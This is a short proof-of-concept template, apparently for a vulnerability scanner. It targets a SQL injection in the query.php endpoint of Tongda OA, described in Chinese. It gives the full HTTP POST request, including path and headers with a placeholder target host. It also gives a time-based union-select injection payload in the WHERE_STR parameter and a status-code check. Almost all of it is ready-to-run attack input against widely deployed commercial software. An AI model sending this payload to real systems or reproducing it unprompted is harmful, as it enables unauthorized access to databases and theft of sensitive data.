<DudePoc_Name>通达 OA query.php 存在SQL注入漏洞</DudePoc_Name>
<DudePoc_Description>北京通达信科科技有限公司通达OA/query.php 存在SQL注入漏洞，攻击者可利用该漏洞获取数据库敏感信息。</DudePoc_Description>
<DudePoc_SetHeader>
POST /general/management_center/portal/oa_engine/engine_manage_bulletin_number/query.php HTTP/1.1
Host: $<AttackHost>$
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>
WHERE_STR=-@`'` union select 1,2,sleep(1)#'&
</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData></DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode></DudePoc_AttackCode>
